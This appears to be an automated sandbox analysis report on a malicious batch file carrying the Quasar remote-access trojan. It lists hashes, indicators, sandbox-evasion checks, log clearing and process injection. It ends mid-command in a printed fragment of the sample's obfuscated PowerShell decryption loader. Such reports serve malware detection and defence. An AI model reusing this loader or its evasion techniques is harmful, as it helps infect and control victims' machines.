Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-12-2024 04:18
Static task
static1
Behavioral task
behavioral1
Sample
Loli.bat
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
Loli.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
Loli.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
Loli.bat
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral5
Sample
Loli.bat
Resource
win11-20241007-en
General
-
Target
Loli.bat
-
Size
7.2MB
-
MD5
b052451fc18d2a15c1d83312b55d09a3
-
SHA1
81ed7f80a894ceaca01153920d3b5e73f593d6a5
-
SHA256
adf4074b727b1f4914e3d1bd154f5d8672d16688960a77d4262e2c620cf7f890
-
SHA512
9102cea466aa291c2df1a4f2d69d4cfe71ef7c7dd048f17719757ed317e80b192337894d59c04fdb95c9c92fc1b0568f2049960ee927bc66d6b421e089a8a659
-
SSDEEP
49152:zHRDNbQ4h2m6rQA3V8VxkTxV824RWYDQhM84IU6ZGnxb6szVaeB8bOYxs4ztgyUv:F
Malware Config
Extracted
quasar
-
encryption_key
03816C045CDE13385E227545D99CA4F0BBE6CC9F
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral5/memory/4484-1771-0x000002587A8D0000-0x000002587B03E000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2576 created 640 2576 powershell.exe 5 PID 4484 created 640 4484 powershell.exe 5 -
Blocklisted process makes network request 3 IoCs
flow pid Process 3 4484 powershell.exe 4 4484 powershell.exe 5 4484 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2576 powershell.exe 4484 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 1 IoCs
pid Process 2192 hlPFLa.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\$nya-edeUuS9o svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2576 set thread context of 3872 2576 powershell.exe 82 PID 4484 set thread context of 3064 4484 powershell.exe 91 -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File created C:\Windows\$nya-onimai2\hlPFLa.exe powershell.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Modifies data under HKEY_USERS 62 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 31 Dec 2024 04:20:52 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1735618852" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={320941CF-975B-4919-B99B-879BD1879B34}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 4484 powershell.exe 4484 powershell.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 4484 powershell.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 4484 powershell.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 3872 dllhost.exe 4484 powershell.exe 3872 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3312 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 3872 dllhost.exe Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeDebugPrivilege 4484 powershell.exe Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeDebugPrivilege 3064 dllhost.exe Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4484 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3588 wrote to memory of 3760 3588 cmd.exe 78 PID 3588 wrote to memory of 3760 3588 cmd.exe 78 PID 3588 wrote to memory of 5060 3588 cmd.exe 79 PID 3588 wrote to memory of 5060 3588 cmd.exe 79 PID 3588 wrote to memory of 3584 3588 cmd.exe 80 PID 3588 wrote to memory of 3584 3588 cmd.exe 80 PID 3588 wrote to memory of 2576 3588 cmd.exe 81 PID 3588 wrote to memory of 2576 3588 cmd.exe 81 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 2576 wrote to memory of 3872 2576 powershell.exe 82 PID 3872 wrote to memory of 640 3872 dllhost.exe 5 PID 3872 wrote to memory of 696 3872 dllhost.exe 7 PID 3872 wrote to memory of 1000 3872 dllhost.exe 12 PID 3872 wrote to memory of 396 3872 dllhost.exe 13 PID 3872 wrote to memory of 540 3872 dllhost.exe 14 PID 3872 wrote to memory of 684 3872 dllhost.exe 15 PID 3872 wrote to memory of 1044 3872 dllhost.exe 16 PID 3872 wrote to memory of 1056 3872 dllhost.exe 17 PID 3872 wrote to memory of 1084 3872 dllhost.exe 18 PID 3872 wrote to memory of 1228 3872 dllhost.exe 20 PID 3872 wrote to memory of 1244 3872 dllhost.exe 21 PID 3872 wrote to memory of 1292 3872 dllhost.exe 22 PID 3872 wrote to memory of 1308 3872 dllhost.exe 23 PID 3872 wrote to memory of 1428 3872 dllhost.exe 24 PID 3872 wrote to memory of 1448 3872 dllhost.exe 25 PID 3872 wrote to memory of 1540 3872 dllhost.exe 26 PID 3872 wrote to memory of 1552 3872 dllhost.exe 27 PID 3872 wrote to memory of 1652 3872 dllhost.exe 28 PID 3872 wrote to memory of 1696 3872 dllhost.exe 29 PID 3872 wrote to memory of 1708 3872 dllhost.exe 30 PID 3872 wrote to memory of 1808 3872 dllhost.exe 31 PID 3872 wrote to memory of 1820 3872 dllhost.exe 32 PID 3872 wrote to memory of 1968 3872 dllhost.exe 33 PID 3872 wrote to memory of 1992 3872 dllhost.exe 34 PID 3872 wrote to memory of 2012 3872 dllhost.exe 35 PID 3872 wrote to memory of 1624 3872 dllhost.exe 36 PID 3872 wrote to memory of 2072 3872 dllhost.exe 37 PID 3872 wrote to memory of 2244 3872 dllhost.exe 39 PID 3872 wrote to memory of 2328 3872 dllhost.exe 40 PID 3872 wrote to memory of 2488 3872 dllhost.exe 41 PID 3872 wrote to memory of 2496 3872 dllhost.exe 42 PID 3872 wrote to memory of 2520 3872 dllhost.exe 43 PID 3872 wrote to memory of 2600 3872 dllhost.exe 44 PID 3872 wrote to memory of 2612 3872 dllhost.exe 45 PID 3872 wrote to memory of 2652 3872 dllhost.exe 46 PID 3872 wrote to memory of 2664 3872 dllhost.exe 47 PID 3872 wrote to memory of 2676 3872 dllhost.exe 48 PID 3872 wrote to memory of 3032 3872 dllhost.exe 49 PID 3872 wrote to memory of 3052 3872 dllhost.exe 50 PID 2576 wrote to memory of 3004 2576 powershell.exe 83 PID 2576 wrote to memory of 3004 2576 powershell.exe 83 PID 696 wrote to memory of 2600 696 lsass.exe 44 PID 3872 wrote to memory of 3108 3872 dllhost.exe 51 PID 696 wrote to memory of 2600 696 lsass.exe 44 PID 3872 wrote to memory of 3312 3872 dllhost.exe 52 PID 3872 wrote to memory of 3452 3872 dllhost.exe 53 PID 3872 wrote to memory of 3472 3872 dllhost.exe 54 PID 3872 wrote to memory of 3828 3872 dllhost.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:640
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:396
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{de9f10a0-159d-470f-9158-cdef41d1b260}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{31eb60a9-f17c-42df-b210-ef089ace5719}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1428
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3032
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1540
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1696
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1992
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1624
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2072
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
PID:2520
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2612
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3052
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3108
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3312 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:784
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:3760
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"QEMU HARDDISK" /c:"DADY HARDDISK"3⤵PID:5060
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function OaEd($Lhlb){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$KNIa=[zYSzYyzYszYtzYezYmzY.zYSezYcuzYrzYizYtyzY.zYCzYrzYypzYtzYozYgrzYazYphzYyzY.zYAzYezYszY]:zY:zYCzYrezYazYtezY()zY;'.Replace('zY', ''); Invoke-Expression -WarningAction Inquire -Debug -Verbose '$KNIa.MLWoLWdLWeLW=LW[LWSLWyLWstLWemLW.LWSLWecLWuLWrLWiLWtyLW.LWCLWryLWpLWtoLWgLWrLWaLWpLWhLWy.LWCLWiLWphLWeLWrMLWodLWeLW]:LW:LWCBLWCLW;'.Replace('LW', ''); Invoke-Expression -WarningAction Inquire -Verbose '$KNIa.PHaaHadHadHaiHanHagHa=Ha[SHaysHatHaeHam.HaSHaeHacHaurHaiHatHay.HaCHaryHapHatHaoHagHarHaapHahHayHa.PHaaHaddHainHagHaMoHadHae]Ha:Ha:HaPHaKHaCSHa7;'.Replace('Ha', ''); Invoke-Expression -InformationAction Ignore '$KNIa.KxUexUyxU=xU[xUSxUyxUsxUtexUm.xUCxUoxUnvxUexUrxUtxU]:xU:xUFxUroxUmxUBaxUsxUexU6xU4xUSxUtrxUixUnxUg("FxUbxUbxU4xUmxUoxUUxUOxUGPxUwrxUfxUQxUh1xUrxUlxUKxUcCxUhxUoxUPLxU/xUZxxUnxUsxUMxUmxU4xU6exUixUVxUmVxUrxUjcxU4=xU");'.Replace('xU', ''); Invoke-Expression -Debug 